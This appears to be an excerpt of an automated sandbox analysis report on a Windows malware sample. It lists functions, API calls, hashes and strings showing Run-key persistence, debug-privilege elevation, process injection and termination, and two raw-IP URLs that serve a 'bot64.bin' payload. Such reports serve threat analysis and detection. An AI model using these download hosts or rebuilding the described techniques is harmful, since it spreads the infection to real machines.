                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                                    • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                                    • Opcode ID: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction ID: 3714aa38a1df849f3200dc3e038043b29052072ac94c8976b800e4e0b8cad165
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3131F83A61C6C18AD730DB64E8983AAB3A0FB85700F401536D2CD87B98EF7DC509EB40
                                                                                                                                                                                                                                                    Function 00007FF63A8338B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                                    • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                                    • Opcode ID: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction ID: 3c4eb0384c1910bfb076501ac58b72f6de3feb621b35ce2903a4f6ee0f703038
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F11337A528B41C6E7908B15F84466A77A0FB857A0F505331F9AE83BE8DF7CD184EB00
                                                                                                                                                                                                                                                    Function 00007FF63A833A58 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 412 7ff63a833a58-7ff63a833a7e VirtualAlloc
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 3461df374489d36aa0d64d8213e908c2e8b1ca3e9096222484e3775c0be6d7a2
                                                                                                                                                                                                                                                    • Instruction ID: c7ee39384471993b6382dfb16f0928c0bb7a710915af0095290353282ecbe8b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3461df374489d36aa0d64d8213e908c2e8b1ca3e9096222484e3775c0be6d7a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74C012B5F2514083D71DDF21E451A0A2A10A745740F504028DA4147784C93DC1514F00
                                                                                                                                                                                                                                                    Function 00007FF63A833A28 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 409 7ff63a833a28-7ff63a833a37 410 7ff63a833a39-7ff63a833a46 VirtualFree 409->410 411 7ff63a833a4c-7ff63a833a50 409->411 410->411
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction ID: fda4bbf18de349ffe67b1d687b0bdf235788953747d06be488414a1ee7772bff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3D01229E38D8181E794EB26EC8971972A0FBC4B44F448075E6CD817A4CF3CC099AF00

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF63A831C20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF63A831C5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 4279794846-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction ID: f5de1b94ad060eb04e643484fcab4e43a23f2537f5adffe24b2a774ee3369f37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6771D93A518A8182E750DB54F89472EB760FBC5B94F105075FACA83BA8DF7DD444AF40
                                                                                                                                                                                                                                                    Function 00007FF63A833FE8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction ID: 58ab5d410e8b9860c3512af6568d5166fa136bf7f699408637889a27f898ecf1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4416A3A618A8186E350CB11F84836EB7A0FB91794F504034EAC987BA8DFBDD448EF00
                                                                                                                                                                                                                                                    Function 00007FF63A832BFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction ID: 6f4fdd2fb6edb5cd289c257ba03fa5951f7390731e5b87be21c3e56477815919
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C41F33A60CB858AE774CB15E84476ABBA0FB94784F104065EACD83B98EF3DD444AB40
                                                                                                                                                                                                                                                    Function 00007FF63A833F08 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2850635065-0
                                                                                                                                                                                                                                                    • Opcode ID: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction ID: e7b61f573c4f0fd3a54703d682eaa5a3bf4bd9644e8beff24535459db646c906
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211E539A0CA8686E770CB10E88836EA3A0FB84794F944275D6DD867E8DF3CD504FB00
                                                                                                                                                                                                                                                    Function 00007FF63A832ED0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetOpenW.WININET ref: 00007FF63A831C64
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: Sleep.KERNEL32 ref: 00007FF63A831C7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetOpenUrlW.WININET ref: 00007FF63A831CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetOpenUrlW.WININET ref: 00007FF63A831CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831CF7
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: Sleep.KERNEL32 ref: 00007FF63A831D02
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: HttpQueryInfoA.WININET ref: 00007FF63A831D32
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831D41
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831D4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: Sleep.KERNEL32 ref: 00007FF63A831D57
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831D71
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetOpenUrlW.WININET ref: 00007FF63A831D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831DB3
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: Sleep.KERNEL32 ref: 00007FF63A831DBE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: HttpQueryInfoA.WININET ref: 00007FF63A831DF6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: GetProcessHeap.KERNEL32 ref: 00007FF63A831E05
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: HeapAlloc.KERNEL32 ref: 00007FF63A831E1B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A831C20: InternetCloseHandle.WININET ref: 00007FF63A831E33
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: GetCurrentProcess.KERNEL32 ref: 00007FF63A83404F
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: OpenProcessToken.ADVAPI32 ref: 00007FF63A834062
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF63A83408A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF63A8340B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: CloseHandle.KERNEL32 ref: 00007FF63A8340C0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: OpenProcess.KERNEL32 ref: 00007FF63A8340D5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833FE8: CloseHandle.KERNEL32 ref: 00007FF63A83414D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63A832F3C
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32 ref: 00007FF63A832F4C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$Open$Process$HeapSleep$HttpInfoQueryToken$AdjustAllocCurrentFreeLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: http://176.111.174.140/bin/bot64.bin$http://176.111.174.177/bin/bot64.bin
                                                                                                                                                                                                                                                    • API String ID: 482118104-517461732
                                                                                                                                                                                                                                                    • Opcode ID: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction ID: 87b76ec4a8bee330967250289bc26031f57a118eb1e45d3cf9a05d953d74b6d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01283DE08A4381E610EB55EC543A923A0EB89794F9044B5E8CCC37E5DF3CE146BB80
                                                                                                                                                                                                                                                    Function 00007FF63A8332F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                                                    • Opcode ID: ff56a69bfc80d85b22c13147ccb1de43f1434e032d74751a2acf5f5f0d48a635
                                                                                                                                                                                                                                                    • Instruction ID: 50cc02f83bf2797ad7507c4c5849546a66263f49f11a279cb79320a1dd74dd78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff56a69bfc80d85b22c13147ccb1de43f1434e032d74751a2acf5f5f0d48a635
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F04F3D90D142C6EE748B01B9183B963E1EB59758F4491F9D2CC827E4DE3DD644BE05
                                                                                                                                                                                                                                                    Function 00007FF63A834808 Relevance: 25.7, APIs: 17, Instructions: 166memoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4026551389-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction ID: 13115f903aa10b4e5404fbe6170c35585e72e3ab14211aae1af0e85809c33863
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3281213AA09B81C6EB54CB55F85436AB7A0FBD8B91F504135EACD837A8DF7CD044AB00
                                                                                                                                                                                                                                                    Function 00007FF63A832FE0 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8344C8: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A83301B), ref: 00007FF63A834510
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8344C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A83301B), ref: 00007FF63A83454D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8344C8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A83301B), ref: 00007FF63A834558
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833A88: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A833020), ref: 00007FF63A833ACB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833A88: RegSetValueExW.ADVAPI32 ref: 00007FF63A833B01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833A88: RegCloseKey.ADVAPI32 ref: 00007FF63A833B10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833B28: RegDeleteKeyW.ADVAPI32 ref: 00007FF63A833B40
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF63A833D3B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: Process32FirstW.KERNEL32 ref: 00007FF63A833D6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: CloseHandle.KERNEL32 ref: 00007FF63A833D80
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: wcscmp.MSVCRT ref: 00007FF63A833D95
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: OpenProcess.KERNEL32 ref: 00007FF63A833DAB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: TerminateProcess.KERNEL32 ref: 00007FF63A833DCE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: CloseHandle.KERNEL32 ref: 00007FF63A833DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: Process32NextW.KERNEL32 ref: 00007FF63A833DEF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833D28: CloseHandle.KERNEL32 ref: 00007FF63A833E01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8338B8: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF63A833A10), ref: 00007FF63A8338E8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00007FF63A8330CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
